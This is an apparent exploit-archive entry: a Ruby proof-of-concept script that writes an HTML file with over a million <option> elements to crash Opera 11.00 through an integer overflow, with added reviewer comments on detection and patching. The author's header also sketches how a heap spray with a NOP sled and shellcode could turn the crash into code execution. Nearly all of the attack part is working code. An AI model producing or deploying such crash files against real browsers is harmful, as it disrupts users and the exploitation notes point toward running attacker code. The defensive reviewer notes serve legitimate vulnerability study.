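#
#
#[+]Exploit Title: Exploit Integer Overflow Opera Web Browser 11.00
#[+]Date: 24\01\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://get12.opera.com/pub/opera/win/1100/int/Opera_1100_int_Setup.exe
#[+]Version: 11.00
#[+]Tested On: WIN-XP SP3 PORTUGUESE BRAZILIAN
#[+]CVE: N/A
#
#
#
#Note:
#This exploit is only a Denial of Service in opera web browser
#I created a poc using heap spray that allow code execution
#but I will not post here because it can be used for evil
#And I do not want that.
# for you to explore the program you control with the number esi childrens then created using a spray heap address any such
#0a0a0a0a the data in address should be the point to the beginning of the shellcode
#0a0a0a0a => \x90\x90\x90 => and your shellcode
#Then the function mov eax, [esi] places the value in eax then the program call eax and boom run shellcode !!!!!
#
#
#
# Reviewer notes:
# - What the script does: it writes one static HTML file containing a single
#   <select> with (0x4141 + 1) * 100 = 1,670,600 identical <option> children.
#   Nothing else is generated; there is no script, shellcode or spray in it.
# - Per the author's header, loading that file crashes Opera 11.00 on
#   Windows XP SP3, and the root cause is described as an integer overflow
#   tied to the number of child elements. The author's further claim of code
#   execution is not demonstrated by anything in this file.
# - No CVE is given on the page, so track it by product/version ("Opera 11.00")
#   rather than by identifier.
# - Defensive takeaways: keep browsers on a current, supported release; a
#   document whose single <select> carries over a million children is far
#   outside normal content, so element-count or size limits in a content
#   filter are a reasonable detection heuristic (TODO confirm thresholds
#   against real traffic before enforcing).
# - The output is large (on the order of 100 MB) and is built fully in memory
#   before being written.

print "[*]Creating the Exploit\n"

# One <option> element line. The original seeded the buffer with one copy and
# appended 0x4141 more in a while loop; the repetition below yields the same
# 0x4142 lines without the manual counter.
option_line = "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</option>\n"
buf = option_line * (0x4141 + 1)

# Assigned exactly once: the original built HTML with repeated `+=`, which
# re-assigns a constant and makes Ruby emit "already initialized constant"
# warnings. The resulting value is byte-identical.
HTML = "<html>\n"+
"<body>\n\n"+
"<select>\n\n"+
buf * 100 +
"\n\n\n\</select>\n\n"+
"</body>\n\n\n"+
"</html>\n\n\n\n\n"

# Block form closes the handle even if the write raises (e.g. disk full),
# which the original open/puts/close sequence did not guarantee.
File.open("Exploit_opera_11.00.html","w") do |f|
  f.puts HTML
end

puts "\n\n\[*]File Created With Sucess"
sleep(1)
puts "[*]Go to my Site www.invasao.com.br!"
sleep(1)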